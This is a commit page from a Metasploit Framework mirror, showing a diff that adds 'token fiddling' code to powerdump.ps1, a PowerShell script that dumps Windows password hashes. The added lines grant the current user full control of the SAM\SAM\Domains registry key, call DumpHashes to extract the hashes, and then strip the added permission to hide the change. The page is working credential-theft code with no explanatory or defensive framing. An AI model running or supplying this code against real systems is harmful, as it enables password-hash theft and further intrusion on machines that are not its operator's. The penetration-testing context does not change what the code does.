infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add token fiddling from nishang

bug/bundler_fix
Meatballs 2014-11-28 23:02:59 +00:00
parent 7ea3cd1b61
commit f5f32fac06
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 25 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
data/exploits/powershell/powerdump.ps1
View File

@ -1,3 +1,6 @@
# PowerDump by David Kennedy Copyright 2014 The Social-Engineer Toolkit
# https://github.com/trustedsec/social-engineer-toolkit
# User Token Code by Nikhil Mitt ttps://github.com/samratashok/nishang
function LoadApi function LoadApi
{ {
$oldErrorAction = $global:ErrorActionPreference; $oldErrorAction = $global:ErrorActionPreference;
@ -354,4 +357,26 @@ function DumpHashes
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower()); [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
} }
} }
#Set permissions for the current user.
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
DumpHashes DumpHashes
#Remove the permissions added above.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl